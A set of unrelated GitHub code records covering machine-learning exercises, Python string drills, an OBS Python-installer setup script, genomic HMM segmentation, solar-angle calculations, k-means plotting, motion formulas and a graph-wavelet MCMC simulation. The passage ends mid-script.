+{"seq_id":"22419427588","text":"#!/usr/bin/env python3\n\"\"\"\nTask 2. Forward Propagation\n\"\"\"\nimport tensorflow as tf\ncreate_layer = __import__('1-create_layer').create_layer\n\n\ndef forward_prop(x, layer_sizes=[], activations=[]):\n \"\"\"\n Creates the forward propagation graph for the neural network\n\n x: placeholder for the input data\n layer_sizes: list containing the number of nodes in each layer of\n the network\n activations: list containing the activation functions for each layer\n of the network\n\n Returns: the prediction of the network in tensor form\n \"\"\"\n\n for i in range(len(layer_sizes)):\n if i == 0:\n new_layer = create_layer(x, layer_sizes[i], activations[i])\n else:\n new_layer = create_layer(new_layer, layer_sizes[i], activations[i])\n\n return new_layer\n","repo_name":"mattowsh/holbertonschool-machine_learning","sub_path":"supervised_learning/01-tensorflow/2-forward_prop.py","file_name":"2-forward_prop.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9649642586","text":"# 1A\n\nstr1 = \"James\"\n\n\n# print(str1[::2])\n\n# 1B\n\ndef middle_word(word):\n middle_index = int(len(word) / 2)\n print(word[middle_index - 1] + word[middle_index] + word[middle_index + 1])\n\n\nstr2 = \"JhonDipPeta\"\nstr3 = \"JaSonAy\"\n# middle_word(str2)\n# middle_word(str3)\n\n\n# 2\n\ns1 = \"Ault\"\ns2 = \"Kelly\"\n\n\ndef word_inside_word(word1=\"a\", word2=\"b\"):\n return f\"{word1[:2]}{word2}{word1[2:]}\"\n pass\n\n\n# print(word_inside_word(s1, s2))\n\n\n# 3\nsw1 = \"America\"\nsw2 = \"Japan\"\n\n\ndef word_insert(word1=\"\", word2=\"\"):\n result = \"\"\n # for x in range(int((len(word1)) / 2)):\n\n result += f\"{word1[0] + word2[0]}\"\n result += f\"{word1[int(len(word1) / 2)] + word2[int(len(word2) / 2)]}\"\n result += f\"{word1[-1] + word2[-1]}\"\n\n return result\n\n\n# print(word_insert(sw1, sw2))\n\n\n# 4\n\nstra1 = \"PyNaTive\"\n\n\ndef lower_char_first(word):\n temp = \"\"\n result = \"\"\n for letter in word:\n if letter.islower():\n result += letter\n else:\n temp += letter\n\n return result + temp\n\n\n# print(lower_char_first(stra1))\n\n\n# 5\n\nstrb1 = \"P@#yn26at^&i5ve\"\n\n\ndef count_symbols(word):\n chars, digits, symbols = 0, 0, 0\n\n for letter in word:\n if letter.isdigit():\n digits += 1\n elif letter.isalpha():\n chars += 1\n else:\n symbols += 1\n\n return chars, digits, symbols\n\n\n# print(count_symbols(strb1))\n\n# 6\n\ns1 = \"Abc\"\ns2 = \"Xyz\"\n\n\ndef mixed_string(s1, s2):\n result = \"\"\n for x in range(len(s1)):\n result += s1[x] + s2[-(x + 1)]\n return result\n\n\n# print(mixed_string(s1, s2))\n\n# 7\n\nsa1 = \"Yn\"\nsa2 = \"PYnative\"\nsb1 = \"Ynf\"\nsb2 = \"PYnative\"\n\n\ndef if_contains_string(s1, word):\n count = 0\n char_list = []\n [char_list.append(s1[x]) for x in range(len(s1))]\n\n for x in range(len(char_list)):\n if char_list[x] in word:\n count += 1\n\n return count == len(s1)\n\n\n# print(if_contains_string(sa1, sa2))\n# print(if_contains_string(sb1, sb2))\n\n\n# 8\n\ns8 = \"Welcome to USA. usa awesome, isn't it?\"\n\n\ndef find_usa(sentence):\n word = \"usa\"\n list1 = \" \".split(sentence)\n count = 0\n\n for x in range(len(sentence)):\n if word == (sentence[x:x + 3]).lower():\n count += 1\n\n return count\n\n\n# print(find_usa(s8))\n\n# 9\n\nstr9 = \"PYnative29@#8496\"\n\n\ndef sum_num(str):\n sum1 = 0\n count = 0\n for symbol in str:\n if symbol.isdigit():\n sum1 += int(symbol)\n count += 1\n\n print(f\"Sum is : {sum1} Average is {sum1 / count}\")\n\n\n# sum_num(str9)\n\n\n# 10\n# I need lot more practice with dictionaries, how to modify them specificly\nstr10 = \"Apple\"\n\n\ndef chars_in_string(str):\n char_dict = {}\n\n for letter in str:\n if letter not in char_dict:\n char_dict[letter] = 1\n\n elif letter in char_dict:\n a = char_dict.get(letter)\n a += 1\n char_dict[letter] = a\n\n print(char_dict)\n\n\n# chars_in_string(str10)\n\n\n# 11\n\n\nstr11 = \"PYnative\"\n\n\ndef reverse_string(str):\n a = []\n [a.append(str[x]) for x in range(len(str))]\n a.reverse()\n str2 = \"\".join(a)\n return str2\n\n\n# print(reverse_string(str11))\n\n# 12\n\nstr12 = \"Emma is a data scientist who knows Python. Emma works at google.\"\n\n\ndef where_is_emma(str):\n for x in range(len(str)):\n # print(str[-x - 5:-x - 1]) # this line is just to see how the loop goes through every substring with lenght of 4 backwards and when it first encounters emma mark that index\n if str[-x - 5:-x - 1] == \"Emma\":\n return (-x - 5) + len(str12)\n\n# print(where_is_emma(str12))\n\n\n# 13\n\nstr13 = \"Emma-is-a-data-scientist\"\n\ndef split_string(str):\n str_list = str.split(\"-\")\n [print(str_list[x]) for x in range(len(str_list))]\n\n#split_string(str13)\n\n#14\n\nstr_list14 = [\"Emma\", \"Jon\", \"\", \"Kelly\", None, \"Eric\", \"\"]\n\ndef remove_empty(list):\n original_list = list.copy()\n new_list = list.copy()\n removed_count = 0\n\n for x in range(len(new_list)):\n if new_list[x - removed_count] == \"\" or new_list[x - removed_count] == None:\n new_list.pop(x - removed_count)\n removed_count += 1\n\n print(f\"Original list of strings:\\n{original_list}\")\n print(f\"After removing empty strings:\\n{new_list}\")\n\n\n\n# remove_empty(str_list14)\n\n\n# 15\n\nstr15 = \"/*Jon is @developer & musician\"\n\ndef remove_special_symbol(str):\n new_str = \"\"\n\n for symbol in str:\n if symbol.isalpha() or symbol == \" \":\n new_str += symbol\n # After this we need to remove extra spaces, the hardest part of this exercise :D:D\n\n new_str_list = new_str.split(\" \")\n\n count = 0\n for x in range(len(new_str_list)):\n if new_str_list[x - count] == \"\":\n new_str_list.pop(x - count)\n count += 1\n \n new_str = \" \".join(new_str_list)\n\n print(new_str)\n\n# remove_special_symbol(str15)\n\n# 16\n\n\nstr16 = 'I am 25 years and 10 months old'\n\ndef remove_all_chars(str):\n result = \"\"\n\n for digit in str:\n if digit.isdigit():\n result += digit\n\n return int(result)\n\n\n\n# print(remove_all_chars(str16))\n\n\n# 17\n\nstr17 = \"Emma25 is Data scientist50 and AI Expert\"\n\ndef number_words(str):\n str_list = str.split(\" \")\n numbers_in_words = []\n\n for word in range(len(str_list)):\n for symbol in range(len(str_list[word])):\n if str_list[word][symbol].isdigit() and str_list[word] not in numbers_in_words:\n numbers_in_words.append(str_list[word])\n\n [print(numbers_in_words[x]) for x in range(len(numbers_in_words))]\n\n# number_words(str17)\n\n# 18\n\nstr18 = '/*Jon is @developer & musician!!'\n\ndef replace_symbols(str):\n a = str\n for symbol in a:\n if not symbol.isdigit() and not symbol.isalpha() and symbol != \" \":\n a = a.replace(symbol, \"#\")\n\n print(a)\n\n# replace_symbols(str18)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Al1babax/Practices","sub_path":"Homework/Al1baba/pynative/Python String Exercise with Solutions.py","file_name":"Python String Exercise with Solutions.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35827993519","text":"from os import environ\nfrom winreg import *\nfrom urllib.request import urlretrieve\nfrom subprocess import run\n\npython_install_key=R'SOFTWARE\\Python\\PythonCore\\3.6\\InstallPath'\npython_url_64='https://www.python.org/ftp/python/3.6.8/python-3.6.8-amd64.exe'\npython_url_32='https://www.python.org/ftp/python/3.6.8/python-3.6.8.exe'\npython_installer_args=' /passive Include_launcher=0 AssociateFiles=0 Shortcuts=0'\nis64='64' in environ['PROCESSOR_ARCHITECTURE'] or '64' in environ['PROCESSOR_ARCHITEW6432']\nglobal_ini_path=environ['appdata']+'/obs-studio/global.ini'\ninstall_path=None\n\ndef ensureInstallPath()->str:\n print('Searching for conflicting python installs')\n try:\n install_path=QueryValue(HKEY_LOCAL_MACHINE, python_install_key)\n print('System python 3.6 found')\n return install_path\n except:\n print('System python 3.6 not found')\n try:\n install_path=QueryValue(HKEY_CURRENT_USER, python_install_key)\n print('User python 3.6 found')\n return install_path\n except:\n print('User python 3.6 not found')\n print('downloading python')\n python_installer=None\n if is64:\n python_installer=urlretrieve(python_url_64)[0]\n else:\n python_installer=urlretrieve(python_url_32)[0]\n print('Installing python')\n run(python_installer+python_installer_args)\n return QueryValue(HKEY_CURRENT_USER, python_install_key)\n\ndef main():\n input('Make sure OBS is closed, then press enter to continue.')\n install_path=ensureInstallPath()\n print('Using '+install_path)\n print('Updating OBS config')\n from configparser import ConfigParser\n config=ConfigParser(strict=False)\n global_ini=open(global_ini_path,'r+',encoding='utf-8')\n config.read_string(global_ini.read().replace('\\ufeff',''))\n if is64:\n keyname='path64bit'\n else:\n keyname='path32bit'\n if config.has_section('Python'):\n config['Python'][keyname]=install_path\n else:\n config['Python']={keyname:install_path}\n global_ini.seek(0)\n global_ini.truncate()\n config.write(global_ini,space_around_delimiters=False)\n global_ini.close()\n input('\\nOBS can now use python 3.6 scripts\\nYou can close this window\\nor press enter to exit')\n\nif __name__ == '__main__':\n main()","repo_name":"sugoidogo/obs-python-installer","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42738503902","text":"\"\"\"\nThis is a wrapper script to run HMMs (pomegranate or hmmlearn)\nwith a few bells and whistles\nv1.3\n\"\"\"\n#!/bin/env python\nimport argparse\nimport bbi\nimport numpy as np\nimport pandas as pd\nimport bioframe\nfrom pomegranate import HiddenMarkovModel, NormalDistribution\nimport matplotlib.pyplot as plt\n\n\ndef get_chroms(genome, ignoreXYMT=True):\n \"Get list of chroms to analyze\"\n print(\"Using chroms from \" + genome)\n chromsizes = bioframe.fetch_chromsizes(genome, filter_chroms=True)\n chr_list = list(chromsizes.index)\n if ignoreXYMT == True:\n chr_list = [i for i in chr_list if i not in (\"chrM\", \"chrX\", \"chrY\")]\n return chr_list\n\n\ndef create_df(inputfile, chroms):\n \"Create dataframe from bigwig\"\n df = pd.DataFrame(columns=[\"chrom\", \"start\", \"end\", \"value\"])\n for item in chroms:\n ivals = list(bbi.fetch_intervals(inputfile, item, 0, -1))\n df_new = pd.DataFrame(ivals, columns=[\"chrom\", \"start\", \"end\", \"value\"])\n df = df.append(df_new, ignore_index=True)\n return df\n\n\ndef hmm(df, num_states):\n \"HMM program\"\n # df['value']=df['value'].replace(0,np.nan) #this removes unmappable areas of chr\n # df_dropna=df.dropna(subset=['value']) #this removes unmappable areas of chr (NaN is otherwise considered 0)\n vals = df[\"value\"].values\n model = HiddenMarkovModel.from_samples(\n NormalDistribution, X=[vals], n_components=num_states\n )\n states = model.predict(vals)\n\n # Rename states to increase with mean signal\n order = np.argsort(df['value'].groupby(states).mean())\n states = [order[s] for s in states]\n df[\"state\"] = states\n df['state'][np.isnan(df['value'])] = np.nan\n return df\n\n\ndef sparse(df):\n \"Merge neighboring bins with same state\"\n chr_list = []\n start_list = []\n state_list = []\n end_list = []\n\n for item in df[\"chrom\"].unique():\n chrom_df = df[df[\"chrom\"] == item].reset_index()\n\n chr_list.append((chrom_df[\"chrom\"].iloc[0]))\n start_list.append((chrom_df[\"start\"].iloc[0]))\n state_list.append((chrom_df[\"state\"].iloc[0]))\n for index, row in chrom_df[1:].iterrows():\n if chrom_df[\"state\"].iloc[index] == chrom_df[\"state\"].iloc[(index - 1)]:\n continue\n else:\n end_list.append(chrom_df[\"end\"].iloc[(index - 1)])\n chr_list.append(chrom_df[\"chrom\"].iloc[index])\n start_list.append(chrom_df[\"start\"].iloc[index])\n state_list.append(chrom_df[\"state\"].iloc[index])\n if len(start_list) != len(end_list):\n end_list.append(chrom_df[\"end\"].iloc[(index)])\n\n keys = [\"chrom\", \"start\", \"end\", \"state\"]\n values = [chr_list, start_list, end_list, state_list]\n dictionary = dict(zip(keys, values))\n df_sparse = pd.DataFrame.from_dict(dictionary)\n return df_sparse.dropna()\n\n\ndef merge_different_hmmstates(df, cLAD, open):\n \"merge strong and weak HMM states into 2 \"\n import pandas as pd\n\n chr_list = []\n start_list = []\n end_list = []\n weak = int(3 - (cLAD + open))\n\n for item in df[\"chrom\"].unique():\n chrom_df = df[df[\"chrom\"] == item]\n start = 1\n for index, row in chrom_df.iterrows():\n if start == 1:\n if df[\"state\"].iloc[index] == cLAD or df[\"state\"].iloc[index] == weak:\n chr_list.append(df[\"chrom\"].iloc[index])\n start_list.append(df[\"start\"].iloc[index])\n start = 0\n continue\n else:\n continue\n elif df[\"state\"].iloc[index] == open:\n end_list.append(df[\"end\"].iloc[(index - 1)])\n start = 1\n else:\n continue\n if start == 0:\n end_list.append(df[\"end\"].iloc[(index)])\n\n if len(chr_list) != len(start_list) or len(start_list) != len(end_list):\n print(\"Wrong Lengths!\")\n break\n\n keys = [\"chrom\", \"start\", \"end\", \"state\"]\n values = [chr_list, start_list, end_list]\n dictionary = dict(zip(keys, values))\n df_merge = pd.DataFrame.from_dict(dictionary)\n return df_merge\n\ndef write_to_file(df, outputfile, num_states, cmap='coolwarm'):\n states = list(range(num_states))\n cmap = plt.get_cmap(cmap)\n colors = {s:cmap(s/states[-1]) for s in states}\n df[\"score\"] = \"0\"\n df[\"strand\"] = \".\"\n filename = outputfile + \"_\" + str(num_states) + \"_state_HMM_colored.bed\"\n df['RGB'] = df[\"state\"].apply(lambda x: ','.join([str(int(round(c*255))) for c in colors[x][:-1]]))\n cols_to_keep = [\n \"chrom\",\n \"start\",\n \"end\",\n \"state\",\n \"score\",\n \"strand\",\n \"start\",\n \"start\",\n \"RGB\",\n ]\n df.to_csv(filename, sep=\"\\t\", header=False, columns=cols_to_keep, index=False)\n","repo_name":"gspracklin/hmm_bigwigs","sub_path":"hmm_bigwigs/bigwig_hmm.py","file_name":"bigwig_hmm.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"3913580581","text":"# Given a string, return the number of substrings of length three where there are no repeated characters.\n# Note that if there are multiple occurrences of the same substring, every occurrence should be counted.\n\ndef length_three_substrings(string):\n if len(string) < 3:\n return 0\n \n pointer1 = 0\n pointer2 = 3\n count = 0\n condition = False\n\n while pointer2 <= len(string):\n temp = ''\n for i in range(pointer1, pointer2):\n if temp.count(string[i]) > 0:\n condition = True\n temp += string[i]\n \n if condition == False:\n count += 1\n\n pointer1 += 1\n pointer2 += 1\n\n return count\n\nprint(length_three_substrings(\"abcdef\"))","repo_name":"alyliann/SEO-PreWork","sub_path":"No-Repeating-Characters.py","file_name":"No-Repeating-Characters.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72650147746","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 20 09:37:31 2016\n\n@author: geddesag\n\"\"\"\nfrom numpy import *\nimport numpy as np\nimport datetime\nimport ephem\nimport time\n\n\ndef decdeg2dms(dd):\n \"\"\"Converts decimal degrees to degrees minutes seconds\"\"\"\n is_positive = dd >= 0\n dd = abs(dd)\n minutes,seconds = divmod(dd*3600,60)\n degrees,minutes = divmod(minutes,60)\n degrees = degrees if is_positive else -degrees\n return str(int(degrees))+\":\"+str(int(minutes))+\":\"+str(seconds)\n\ndef sunzen_ephem(time,Lat,Lon,psurf,temp):\n \"\"\"Calculates the solar zenith and azimuth angles for a given datetime object (utc), \n latitude (deg), longitude (deg), psurf(mb), temp(deg c)\"\"\"\n observer = ephem.Observer()\n observer.lon = decdeg2dms(Lon)\n observer.lat = decdeg2dms(Lat)\n observer.date = time\n \n \n \"\"\"If you dont want to consider refraction effects, set observer.pressure to 0\"\"\"\n observer.pressure=psurf\n observer.temp=temp\n \n #observer.compute_pressure()\n \"\"\"We can also include the observer altitude, this is for the geometric difference that you would get\n rather than any difference in pressure, which has already been handled. Its largely irrelevant unless you\n are 10s of km high\"\"\"\n \n #observer.altitude=30000 #metres\n \n \"\"\"set what we are looking at, if we want the moon, we can change to moon = ephem.Moon(observer)\n and then change the subsequent code to call moon.alt or moon.az\"\"\"\n \n sun = ephem.Sun(observer)\n # sun.compute(observer)\n alt_atr = float(sun.alt)\n solar_altitude=180.0*alt_atr/pi\n solar_zenith=90.0-solar_altitude\n solar_azimuth=180*float(sun.az)/pi\n return solar_zenith, solar_azimuth\n \ndef moonzen_ephem(time,Lat,Lon,psurf,temp):\n \"\"\"Calculates the solar zenith and azimuth angles for a given datetime object (utc), \n latitude (deg), longitude (deg), psurf(mb), temp(deg c)\"\"\"\n observer = ephem.Observer()\n observer.lon = decdeg2dms(Lon)\n observer.lat = decdeg2dms(Lat)\n observer.date = time\n \n \n \"\"\"If you dont want to consider refraction effects, set observer.pressure to 0\"\"\"\n observer.pressure=psurf\n observer.temp=temp\n \n #observer.compute_pressure()\n \"\"\"We can also include the observer altitude, this is for the geometric difference that you would get\n rather than any difference in pressure, which has already been handled. Its largely irrelevant unless you\n are 10s of km high\"\"\"\n \n #observer.altitude=30000 #metres\n \n \"\"\"set what we are looking at, if we want the moon, we can change to moon = ephem.Moon(observer)\n and then change the subsequent code to call moon.alt or moon.az\"\"\"\n \n moon = ephem.Moon(observer)\n # sun.compute(observer)\n alt_atr = float(moon.alt)\n moon_altitude=180.0*alt_atr/pi\n moon_zenith=90.0-moon_altitude\n moon_azimuth=180*float(moon.az)/pi\n return moon_zenith, moon_azimuth\n \n \ndef format_time(datetime_obj):\n \"\"\"Quick function that formats a datetime object in to HH:MM:SS string format\"\"\"\n out =str('%02d:%02d:%02d' % (int(datetime_obj.hour), int(datetime_obj.minute), int(datetime_obj.second)))\n return out\n \ndef find_nearest(array,value):\n \"\"\"Finds the index in array where the array element is closest to the value argument\"\"\"\n idx = (np.abs(array-value)).argmin()\n return idx\n \n \ndef sza_info(lat,lon,utc_offset,psurf,temp):\n \"\"\"Calculates useful information for Today based on latitude(deg), longitude(deg),\n utc offset, surface pressure (mb) and temperature (deg C)\n \"\"\"\n time_utc=datetime.datetime.utcnow() #Todays date and time in UTC\n \n time_local=time_utc+datetime.timedelta(hours=utc_offset) #Local date and time\n \n \n times_local=[]\n sza_ref=[] \n times_utc=[]\n \n \"\"\"This takes a bit of explaining...Its a loop calculating the sza at different times. However it is \n not so simple. Because ephem works exclusively in utc time we have to calculate a time array of that\n but it has to represent one day at the location, from midnight to midnight. Thats why I start the array\n at local day at 0:0:0, with a subtraction of the utc_offset, and then iterate over the calculation every day.\n I can probably make this cleaner by using different datetime functions, but because I regularly look at utc\n or local times, it made sense to keep everything as dependent on that than anything else.\"\"\"\n \n for i in range(86400):\n times_utc.append(datetime.datetime(time_local.year,time_local.month,time_local.day,0,0,0)+datetime.timedelta(seconds=i)-datetime.timedelta(hours=utc_offset))\n sza_ref.append(sunzen_ephem(times_utc[i],lat,lon,psurf,temp)[0])\n times_local.append(times_utc[i]+datetime.timedelta(hours=utc_offset))\n\n\n\n\n \"\"\"Now we look through the sza reference array to find the max and minimum values and note there index\"\"\"\n sza_time_local=[]\n high_sun_idx=where(array(sza_ref)==min(array(sza_ref)))[0][0]\n low_sun_idx=where(array(sza_ref)==max(array(sza_ref)))[0][0]\n high_sun_sza=sza_ref[high_sun_idx]\n low_sun_sza=sza_ref[low_sun_idx]\n high_sun_time=format_time(times_local[high_sun_idx].time())\n low_sun_time=format_time(times_local[low_sun_idx].time())\n\n \"\"\"To find sunrise and sunset is a little trickier. I use a find nearest function to find the index of \n the array where it is closest to 90 degrees. I do this twice, once before the high sun index (midday)\n and once for the rest of the day. This guarantees we find sunrise and sunset. Currently we define sunrise at \n SZA = 90 but this could be adjusted easily. \"\"\"\n sunrise_idx=find_nearest(array(sza_ref[0:high_sun_idx]),90.0)\n sunset_idx=find_nearest(array(sza_ref[high_sun_idx:]),90.0)+high_sun_idx\n sunrise_s=sza_ref[sunrise_idx]\n sunset_s=sza_ref[sunset_idx]\n \n sunrise=times_local[sunrise_idx]\n sunset=times_local[sunset_idx]\n \n \n day_length=str(times_local[sunset_idx]-times_local[sunrise_idx])\n \n \"\"\"Last little thing, may or may not be useful. if nearest value to 90 is above 91 or below 89, \n the sun is permanently set or risen. So I return an n/a value for the formatted string.\"\"\"\n \n if sunrise_s<=89 or sunrise_s>=91.:\n sunrise=\"n/a\"\n day_length=\"n/a\"\n \n if sunset_s<=89 or sunset_s>=91.:\n sunset=\"n/a\" \n day_length=\"n/a\"\n \n \"\"\"Here is a quick plot of the sza in local and utc time\"\"\"\n# fig=figure(1)\n# ax1=fig.add_subplot(111)\n# ax1.plot(times_local,sza_ref)\n# show()\n \n \"\"\" Note the slight wobbles around sza 92, due to refraction, otherwise smooth\"\"\"\n\n\n return high_sun_time, high_sun_sza, low_sun_time, low_sun_sza, sunrise, sunset, day_length,times_local,sza_ref\n ","repo_name":"geddes88/CamPy4Pi","sub_path":"solar_calc.py","file_name":"solar_calc.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41601900979","text":"import sys\nimport torch \nimport pickle\nimport argparse\nfrom pathlib import Path\n\nimport plotly \nimport plotly.graph_objs as go\nfrom plotly import tools \n\nif __name__ == '__main__': \n\n parser = argparse.ArgumentParser(description='Argument Parser') \n parser.add_argument('--data', type=str, default='ecg', \n help='type of the dataset (ecg, gesture, power_demand, space_shuttle, respiration, nyc_taxi')\n parser.add_argument('--filename', type=str, default='chfdb_chf13_45590.pkl', help='filename of the dataset') \n\n args = parser.parse_args() \n\n root_path = Path('kmeans', args.data, args.filename)\n center = torch.load(str(root_path.joinpath('kmeans.pt'))) \n centers = center.view(-1,64,2) \n\n fig = tools.make_subplots(rows=4, cols=5) \n\n for i in range(centers.size(0)):\n\n for j in range(2): \n\n if j==0:\n c = 'rgb(205,12,24)' \n else:\n c = 'rgb(22, 96, 167)' \n\n trace_normal = go.Scatter( \n x = torch.range(0, 63), \n y = centers[i][:,j], \n mode = 'lines', \n line = dict(color=c), \n )\n \n fig['layout']['xaxis%d'%(i+1+j*10)].update(showgrid=False, zeroline=False, showline=True, mirror='ticks', showticklabels=False)\n fig['layout']['yaxis%d'%(i+1+j*10)].update(showgrid=False, zeroline=False, showline=True, mirror='ticks', showticklabels=False)\n \n print(i//5+1+(j)*2, i%5+1) \n fig.append_trace(trace_normal, i//5+1+(j)*2, i%5+1) \n\n plotly.offline.plot(fig) \n","repo_name":"YongHoYoo/AnomalyDetection","sub_path":"3_display_kmeans.py","file_name":"3_display_kmeans.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"45328368743","text":"def acceleration_formula(v_0, v_max, x_remaining, a):\n # Make sure everything is a float!\n v_0 = float(max(v_0, 0))\n v_max = float(v_max)\n x_remaining = float(max(x_remaining, 0))\n a = float(a)\n\n if abs(v_0 - v_max) <= 1e-5:\n # Assume that they are already equal, as otherwise there might be some catastrophic rounding\n return (v_max, x_remaining / v_max)\n\n if x_remaining <= 1e-3:\n return (v_0, 0.0)\n\n # Solve x = v_0 * t + 0.5 * a * t^2 for t\n # Equivalent to 0.5 * a * t^2 + v_0 * t - x = 0\n d = v_0**2 - 2 * a * (-x_remaining)\n t_1 = (-v_0 + d**0.5) / a\n t_2 = (-v_0 - d**0.5) / a\n t_solve = max(t_1, t_2)\n\n # Determine the velocity we have at the end, with this acceleration\n v = v_0 + a * t_solve\n\n # Check if we would go too fast\n if v > v_max:\n # We would go to fast, so cap it\n # First check at what time we reach the velocity\n t_v_max = (v_max - v_0) / a\n\n # Now find out at what place we reach this, and the remaining distance\n x_a = v_0 * t_v_max + a / 2 * t_v_max**2\n x_i = x_remaining - x_a\n\n # Now travel the first part with acceleration, but the final part at maximal velocity\n t = t_v_max + x_i / v_max\n return (v_max, t)\n else:\n # Everything is fine\n return (v, t_solve)\n\ndef brake_formula(v_0, t_poll, x_remaining):\n v_0 = float(v_0)\n t_poll = float(t_poll)\n x_remaining = float(x_remaining)\n\n if v_0 <= 1e-4 or x_remaining <= 1e-4:\n return (0, 0)\n\n # Find out how long it takes in seconds to stop in the alloted distance\n t = 2 * x_remaining / v_0\n\n # Find the acceleration we needed to do this\n a = -v_0 / t\n\n # Determine the values after the polling interval\n new_v = v_0 + a * t_poll\n x_travelled = v_0 * t_poll + a / 2 * t_poll**2\n\n # Make sure it is positive\n new_v = max(new_v, 0)\n x_travelled = max(x_travelled, 0)\n\n return (new_v, x_travelled)\n\n","repo_name":"baturayo/Modeling-of-Software-Intensive-Systems","sub_path":"DEVS Modelling and Simulation/Models/formulas.py","file_name":"formulas.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"71634615911","text":"######################\n\n###### required modules ######\nexec(open('import_modules.py').read())\nexec(open('Graph_decomposition.py').read())\nexec(open('MCMC_run.py').read())\nexec(open('multi_stage_lasso.py').read())\nexec(open('MCMC_prediction.py').read())\nexec(open('simulation_generate.py').read())\n\n\n\n###### generate graph and non-gaussian process ######\nn = 300\np = 0.28\nG_sim,pos = generate_random_geometric_graph(n, p, 1)\n\nprint(len(G_sim.edges))\n\n## compute matrix and eigenvalue/vectors\n_, _, _, L_lambda_set, L_lambda_vec = graph_matrix_eigen(G_sim)\n\nprint('finished graph-------')\n\n## kernels\nJ = 2\nK_par= 1\nlambda_max = L_lambda_set[-1]\ng_vals, h_vals,_ = kernal_gh(lambda_set = L_lambda_set,\n J=J,lambda_max=lambda_max,K=K_par, x1=1, x2=2)\n\nprint('finished kernels-------')\n\n## wavelets and scaling\nstart = time.time()\n\nphi_set2 = np.zeros((n,n))\nfor vi in range(n):\n for ui in range(vi+1):\n phi_set2[vi,ui] = phi(vi,ui,L_lambda_set,L_lambda_vec,h_vals)\n\nphi_set = phi_set2 + phi_set2.T - np.diag(phi_set2.diagonal())\n\npsi_set = np.zeros((J,n,n))\npsi_set2 = np.zeros((J,n,n))\nfor j in range(J):\n for vi in range(n):\n for ui in range(vi+1):\n psi_set2[j,vi,ui] = psi(j,vi,ui,L_lambda_set,L_lambda_vec,g_vals)\n psi_set[j,:,:] = psi_set2[j,:,:] + psi_set2[j,:,:].T - np.diag(psi_set2[j,:,:].diagonal())\n\ndel psi_set2, phi_set2\nprint(time.time()-start)\n\nprint('finished wavelets-------')\n\n## porcess Z\nK=7\nsigma2_true = np.array([6*(2.5)**(-(j+1)) for j in range(J)])\ntau2_true = 1\nsigma2_0_true = 0.5\n\n## set prior parametres for sigma_j^2 tau^2 tau^2_d\npara_prior_names = ['alpha_0','beta_0','s','alpha_j','beta_j','alpha_tau2','beta_tau2']\npara_prior_values =[np.array([1.2]),np.array([4]),np.array([4]),\n np.array([5,5]),np.array([1,1]),np.array([1.2]),np.array([4])]\npara_prior = dict()\nfor i in range(len(para_prior_names)):\n para_prior[para_prior_names[i]] = para_prior_values[i]\n\nZ, comp_mat = generate_Z(scaling_func = phi_set, wavelet_func = psi_set,\n K=K, sigma2 = sigma2_true,\n tau2=tau2_true,sigma2_0 = sigma2_0_true ,s = para_prior['s'])\n\ndesign_mat = {mat: val for mat, val in comp_mat.items() if mat in ['P','R', 'A']}\nprint('Z dim: '+str(Z.shape[1]))\nprint('finished generating process-------')\n\ntrue_para = dict(sigma2=sigma2_true, tau2 = np.array([tau2_true]), sigma2_0=np.array([sigma2_0_true]), \n C = comp_mat['C'], V=comp_mat['V'], D=comp_mat['D'])\n\n\n\n###### multi-stage-lasso for prior determination ######\n## if missing data is preferred, it can implemented by rate argument (ranging from 0 to 1)\nZ_full, design_mat_full, M_full, _,_ = generate_missing_value(Z, design_mat, rate=0)\nstart = time.time()\nsummary = graph_KFold(Z_full, design_mat_full, M_full, \n alpha1 = np.arange(0.0005,0.0021,0.0001), \n alpha2 = np.arange(0.0001,0.00045,0.00005),\n l1_ratio = 1.0,\n s = para_prior['s'][0],\n n_splits=10, seed_splits=1)\nprint(str(np.round(time.time()-start,4))+'s')\n\n## one can determined the optimal based on certain metrics\nest_var = list(summary[sub_result['MPE']==summary['MPE'].min()].iloc[0,3:7])\npara_prior['beta_0'] = (para_prior['alpha_0']-1)*est_var[1]\npara_prior['beta_j'] = (para_prior['alpha_j'])/est_var[2:]\npara_prior['beta_tau2'] = (para_prior['alpha_tau2']-1)*est_var[0]\n\n\n\n\n\n###### MCMC run #######\nprint('start MCMC-------')\nstart = time.time()\n# mcmc_server = adaptive_MCMC_process(Z,design_mat, para_init = true_para,para_prior=para_prior,\n# num_iter=120000,seed=10, print_info=False)\n\n#para_init = true_para\nprint('using initials var a bit deviated from the true ---')\nprint('the initial values of c,d and V are specified as zero vectors, and an all-ones vector, respectively.')\npara_init_var = dict(sigma2=np.array(est_var[2:]), \n tau2 = np.array([est_var[0]]), \n sigma2_0=np.array([est_var[1]]))\n\npara_init = dict(sigma2= para_init_var['sigma2']+0.1, \n tau2 = para_init_var['tau2']+0.1, \n sigma2_0= para_init_var['sigma2_0']-0.2, \n C = np.zeros((n*J,K)), \n V = np.ones((n*J,K)), \n D = np.zeros((n,K)))\n\nprint(para_prior)\nnum_iter = 200000\nsamples = [0]*(num_iter+1)\nsamples[0] = para_init.copy()\nold_para = para_init.copy()\n# np.random.seed(seed)\nfor m in range(1,num_iter+1):\n new_para = adaptive_MCMC_one_new(Z=Z_process, design_mat=design_mat_process, \n old_para=old_para,\n para_prior=para_prior,\n n_obs = n_obs,\n true_step1=False, 